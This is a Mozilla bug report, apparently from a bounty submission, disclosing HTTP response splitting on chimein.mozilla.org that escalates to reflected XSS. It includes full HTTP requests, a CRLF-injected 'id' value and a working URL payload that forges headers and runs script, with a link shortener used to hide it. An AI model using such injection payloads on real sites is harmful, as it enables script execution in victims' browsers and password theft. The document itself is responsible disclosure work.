Closed Bug 1311887 Opened 7 years ago Closed 7 years ago

HTTP Response Splitting in chimein.mozilla.org (leverage to Reflected XSS)

Categories

(Websites :: Other, defect)

Product:
Websites
Component:
Other
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED FIXED

People

(Reporter: yann.cam, Unassigned)

References

(
URL
)

Details

(Whiteboard: [reporter-external] [web-bounty-form] [verif?])

Attachments

(1 file)

HTTP Response Spliting leverage to RXSS in Chimein.mozilla.org
256.27 KB, application/x-zip-compressed
Details 
Hello Mozilla Security  team,

The chimein.mozilla.org domain (https://chimein.mozilla.org/) provides a very simple "sign up / sign in / send message" process with asymetric encryption (public key, private key, password and passphrase) to add a strong security for message exchange.

Exchange requests are made through API call, for example when a user POST a message, it's the "/message/create" entry point which is called. To list message "/message/list",  and to consult a specific message the following request is made (as example, the message ID  : 57 owned by the user ycam with password ycam used as Proof of Concept) :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

login=ycam&password=ycam&id=57

The resulting data are like (JSON) :

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 1525
Date: Fri, 21 Oct 2016 00:05:14 GMT
Connection: close

{"id":57,"sender":"ycam","recipient":"ycam","subject":"ycam","subject_signature":"C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E\r\n/PMRAbK6IZF9O9G+kOmy9a/mSPY9L8yiFdwk8CXzW/nvmirx3qelwQ87z3cgrxGe8um7Ntc603h2\r\nWrux3wQrv5JptqEMC1Cj+atQQQ/B6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI\r\nKpy/0TgJhkpWj+PO3YIvxy015imeISUgmZyTmOaJAy7/OQzvw5GUAS5nTG/tU79kO7AlhQLTgjlL\r\nE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw==","body":"O8E+SCVlBZiL8xsg0yEg+K5+jdHKkuQA89z8FpLDekOT3CUa43B/Qw+BxyCTgccngdRp7en7Zi+M\r\nwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK","body_signature":"kFLh+gNR1Ow2zuxqRebnYmiB/N2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z+YF13e\r\nzyWBWtwmSPff+6JFWIHGqYI2RR+qszbAduHwHSniFPkz0gKntc/xOe8GFX62z78pAPJfZ4tLyg8p\r\nLobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt+6t7GkCWf799ztY8R0WYJ8q\r\nskQAYD5LuHpdadi8+8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj+F9z8KFgc\r\nvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ==","session_key":"a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG+MmtmZjcwAPJjXePxH8/1XWWolhPn1fRmf4j9ybmo\r\nlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM\r\nTxVPIcT/vLbjTA0hrnzmm/tiyq31YPVOYq3Di95urw38DFJIRPKiP/cJ0GoWkUrcB6OK8lCfvx0K\r\nWsS+PpAB/c1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ+2AkjhwcNzqWHQb\r\nHHm1wN6fkalHKXW7+wM2ctioB1JaE3gYE7WmGA==","session_key_iv":"zOtfAHFpmaW+hm2xcJhPxw==","status":"read","sent_date":"2016-10-20T23:05:30.009Z","retrieved_date":"2016-10-20T23:06:45.811Z","read_date":"2016-10-20T23:06:48.066Z"}

Screenshot : 
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png

If a user change the value of the "id" in POST param of the initial request, the following error is retrieved :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

login=ycam&password=ycam&id=xxx

Error received :

HTTP/1.1 500 message xxx does not exist
Date: Fri, 21 Oct 2016 00:07:11 GMT
Connection: close
Content-Length: 0

Screenshot : 
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png

There is a reflection of the "id" value in the HTTP headers returned by the server.

With the sequence %0a%0d (\r\n), an attacker can forge headers and responses content himself :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

login=ycam&password=ycam&id=xxx%0a%0dyyy%0a%0dzzz%0a%0d

Response :

HTTP/1.1 500 message xxx

yyy

zzz

 does not exist
Date: Fri, 21 Oct 2016 00:08:40 GMT
Connection: close
Content-Length: 0

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png

So, with a specific payload, an attacker can forge his own response from the server with the right headers (Content-Type: text/html) and arbitrary source code. Plus, the payload can be sent directly in GET param or in POST param. In GET, the vulnerability is more easy to sent to victims :

https://chimein.mozilla.org/message/get?login=ycam&password=ycam&id=x%0a%0dContent-Length: 100%0a%0dContent-Type: text/html%0a%0d%0a%0d<html><body><script>alert(document.domain)</script></body></html><!--

Or hidden with the url-shortener bit.ly :

https://mzl.la/2eypf8b

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png

Tested successfully with the latest Firefox version 49.0.2.

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits.

Through XSS, an attacker can tamper with page rendering, take the control of the full browser and can use browser's exploits to gain privilege on local system (especially with dedicated framework for XSS flaw like BeEF : http://beefproject.com/).
An attacker will be able to create fake page, fake prompt, fake "re-authentication" process to steal victim's password. If the attacker gains access to a victim's account, he can used all the feature of the secure chat in place of the legitimate user.

HTTP Response Splitting resources :
- https://en.wikipedia.org/wiki/HTTP_response_splitting
- https://www.owasp.org/index.php/HTTP_Response_Splitting

Do not hesitate to contact me for more information,

Sincerely,
Flags: sec-bounty?
Resolved by removing site from DNS.
Group: websites-security
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Flags: sec-bounty? → sec-bounty-
Resolution: --- → FIXED
You need to log in before you can comment on or make changes to this bug.